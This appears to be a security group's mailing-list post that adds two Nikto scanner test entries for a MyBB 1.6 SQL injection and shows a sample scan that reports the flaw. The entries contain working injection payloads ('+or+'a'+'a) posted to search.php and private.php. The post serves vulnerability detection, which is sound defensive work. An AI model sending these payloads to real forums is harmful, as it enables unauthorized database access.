<span style="font-family: courier new,monospace;">udb_tests<br>=========<br><br><span style="font-family: courier new,monospace;">"400000","0","9","/search.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBB 1.6 <= SQL Injection, ref: <a href="http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a>","action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1",""<br>
<br style="font-family: courier new,monospace;"></span><span style="font-family: courier new,monospace;">"400001","0","9","/private.php","POST","MyBB has experienced an internal SQL error and cannot continue.","","","Sorry, but no results were returned","","MyBBx 1.6 <= SQL Injection, ref: <a href="http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a>","my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff",""</span><br>
<br><br>Testing<br>========<br><br><br>>perl <a href="http://nikto.pl">nikto.pl</a> -h <a href="http://attacker.in">http://attacker.in</a> -root /mybb -useproxy </span><br style="font-family: courier new,monospace;"><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">+ Target Port: 80</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ Proxy: localhost:8080</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">+ Start Time: 2010-12-25 02:28:34</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">---------------------------------------------------------------------------</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">+ Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;"> DAV/2</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ /search.php: MyBB 1.6 <= SQL Injection, ref: <a href="http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection">http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection</a></span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">+ 2 items checked: 0 error(s) and 1 item(s) reported on remote host</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ End Time: 2010-12-25 02:28:52 (18 seconds)</span><br style="font-family: courier new,monospace;">
<span style="font-family: courier new,monospace;">---------------------------------------------------------------------------</span><br style="font-family: courier new,monospace;"><span style="font-family: courier new,monospace;">+ 1 host(s) tested</span><br style="font-family: courier new,monospace;">
<br><br>---------------------------------<br>Best regards,<br>YGN Ethical Hacker Group<br>Yangon, Myanmar<br><a href="http://yehg.net">http://yehg.net</a><br>Our Lab | <a href="http://yehg.net/lab">http://yehg.net/lab</a><br>
Our Directory | <a href="http://yehg.net/hwd">http://yehg.net/hwd</a><br>